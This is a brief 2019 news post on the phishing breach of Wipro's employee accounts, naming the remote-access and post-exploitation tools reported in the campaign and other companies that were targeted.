Hackers Are Using PowerShell Modules and Hacking Tools for Remote Access & Post-Exploitation to Hack Wipro

Jun 04, 2019
Posted by
Cyber Security

India’s leading and well known company, Wipro, was attacked by the security breach earlier this month as the company Employees’ were subjected to very advanced phishing activity. The attackers used a remote access tool, Powerkatz, and Powersploit in the campaign.

The ScreenConnect is a remote access tool that is used to provide desktop support or for remote meetings and the Powerkatz is the PowerShell version of Mimikat used in post-exploitation that is able to search memory for credentials. There is also a tool called Powersploit, a collection of PowerShell modules used for penetration-testing engagements.

It was also found that the attackers responsible for phishing campaigns compromised more than 100 computer system and they also even targeted Infosys and Cognizant.

Flashpoint determines that phishing domains are used as a primary attack vector, the phishing domain hosting templates lure victims to enter their Windows usernames and passwords to access encrypted email. Flashpoint researchers analysis that a half-dozen were malicious domains hosting templates consistent with credential phishing attempts. The templates sought victims’ Windows usernames and passwords in order to allegedly access encrypted email.

Reaves and Platt told Threatpost that the event underscores the security implications of third-party relationships.

 Investigation also found an another malware Imminent Monitor, a remote administration tool which is being distributed through Word document. The document contained a URL that is redirected to a file hosted at flexmail[.]tv, which is appeared to have been used multiple times to deliver documents and payloads in other campaigns.

The hackers ultimate aim is to gain access to the portals, in multiple industries that use to manage gift card and rewards programs.

Not only Wipro is targeted by the hackers, but they are also targeting similar companies, according to Kerbs the campaign targets Cognizant, Infosys, Rackspace, Capgemini, and Slalom detected similar patterns of phishing attack activity as of Wipro.

A Spokesperson from Wipro said, that they came to know of a potentially abnormal activity from their network, which was related to very few employee accounts. These employee accounts were subjected to very advanced phishing activity.

The Flashpoint is pretty sure and confident that the threat actors are linked to the 2017 phishing campaign. Security researchers said, the threat actors to other malicious activity dating back to 2017, and possibly 2015, as well as the re-use of infrastructure from those older attacks. Last month, the malicious campaign had targeted some of Wipro employee accounts.